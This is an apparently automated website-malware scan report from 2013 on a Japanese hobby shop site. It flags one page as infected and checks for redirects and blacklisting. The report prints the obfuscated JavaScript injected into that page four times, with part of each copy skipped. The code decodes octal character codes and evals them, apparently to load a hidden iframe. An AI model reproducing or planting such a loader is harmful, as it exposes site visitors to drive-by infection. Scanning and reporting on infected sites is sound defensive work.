www.iwadatehobby.co.jp has 4 malicious pages

New scan:

www.iwadatehobby.co.jp

(cached results from Sat Oct 19 18:06:13 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
4/0/10
4 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Setup daily monitoring of www.iwadatehobby.co.jp

Paste the following HTML code anywhere into "www.iwadatehobby.co.jp" website.

eVuln.com

Scanned pages/files

RequestServer responseStatus
http://www.iwadatehobby.co.jp/
200 OK
Content-Length: 51073
Content-Type: text/html
clean
http://www.iwadatehobby.co.jp/index.htm
200 OK
Content-Length: 51073
Content-Type: text/html
clean
http://www.iwadatehobby.co.jp/link/okaimono.htm
200 OK
Content-Length: 16384
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,152,66,152,67,72,71,62,147,163,161,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,152,62,167,170,175,160,151,62,164,163,167,155,170,155
... 3915 bytes are skipped ...
,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(8-4)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.27
Avast
JS:Decode-AMQ [Trj]
Comodo
TrojWare.JS.Redirector.ZK
McAfee-GW-Edition
JS/Blacole-Redirect.ae
Kaspersky
Trojan.JS.Iframe.aes
Fortinet
JS/Agent.GWJ!tr.dldr
McAfee
JS/Blacole-Redirect.ae
NANO-Antivirus
Trojan.Script.Expack.bsywaz
F-Prot
JS/IFrame.SW.gen
AVG
HTML/Framer
GData
JS:Decode-AMQ
Commtouch
JS/IFrame.SW.gen

http://www.iwadatehobby.co.jp/link/../index.htm
200 OK
Content-Length: 51073
Content-Type: text/html
clean
http://www.iwadatehobby.co.jp/link/../link/okaimono.htm
200 OK
Content-Length: 16384
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,152,66,152,67,72,71,62,147,163,161,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,152,62,167,170,175,160,151,62,164,163,167,155,170,155
... 3915 bytes are skipped ...
,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(8-4)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.27
Avast
JS:Decode-AMQ [Trj]
Comodo
TrojWare.JS.Redirector.ZK
McAfee-GW-Edition
JS/Blacole-Redirect.ae
Kaspersky
Trojan.JS.Iframe.aes
Fortinet
JS/Agent.GWJ!tr.dldr
McAfee
JS/Blacole-Redirect.ae
NANO-Antivirus
Trojan.Script.Expack.bsywaz
F-Prot
JS/IFrame.SW.gen
AVG
HTML/Framer
GData
JS:Decode-AMQ
Commtouch
JS/IFrame.SW.gen

http://www.iwadatehobby.co.jp/link/../link/../index.htm
200 OK
Content-Length: 51073
Content-Type: text/html
clean
http://www.iwadatehobby.co.jp/link/../link/../link/okaimono.htm
200 OK
Content-Length: 16384
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,152,66,152,67,72,71,62,147,163,161,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,152,62,167,170,175,160,151,62,164,163,167,155,170,155
... 3915 bytes are skipped ...
,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(8-4)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.27
Avast
JS:Decode-AMQ [Trj]
Comodo
TrojWare.JS.Redirector.ZK
McAfee-GW-Edition
JS/Blacole-Redirect.ae
Kaspersky
Trojan.JS.Iframe.aes
Fortinet
JS/Agent.GWJ!tr.dldr
McAfee
JS/Blacole-Redirect.ae
NANO-Antivirus
Trojan.Script.Expack.bsywaz
F-Prot
JS/IFrame.SW.gen
AVG
HTML/Framer
GData
JS:Decode-AMQ
Commtouch
JS/IFrame.SW.gen

http://www.iwadatehobby.co.jp/link/../link/../link/../index.htm
200 OK
Content-Length: 51073
Content-Type: text/html
clean
http://www.iwadatehobby.co.jp/link/../link/../link/../link/okaimono.htm
200 OK
Content-Length: 16384
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,152,66,152,67,72,71,62,147,163,161,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,152,62,167,170,175,160,151,62,164,163,167,155,170,155
... 3915 bytes are skipped ...
,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(8-4)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.27
Avast
JS:Decode-AMQ [Trj]
Comodo
TrojWare.JS.Redirector.ZK
McAfee-GW-Edition
JS/Blacole-Redirect.ae
Kaspersky
Trojan.JS.Iframe.aes
Fortinet
JS/Agent.GWJ!tr.dldr
McAfee
JS/Blacole-Redirect.ae
NANO-Antivirus
Trojan.Script.Expack.bsywaz
F-Prot
JS/IFrame.SW.gen
AVG
HTML/Framer
GData
JS:Decode-AMQ
Commtouch
JS/IFrame.SW.gen

http://www.iwadatehobby.co.jp/link/../link/../link/../link/../index.htm
200 OK
Content-Length: 51073
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: www.iwadatehobby.co.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Oct 2013 15:06:14 GMT
Accept-Ranges: bytes
ETag: "36429cf-c781-4facde08"
Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7i
Content-Length: 51073
Content-Type: text/html
Last-Modified: Fri, 11 May 2012 09:38:16 GMT

...51073 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: www.iwadatehobby.co.jp
Referer: http://www.google.com/search?q=www.iwadatehobby.co.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www.iwadatehobby.co.jp

Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://www.iwadatehobby.co.jp/

Result: www.iwadatehobby.co.jp is not infected or malware details are not published yet.
Infected sites found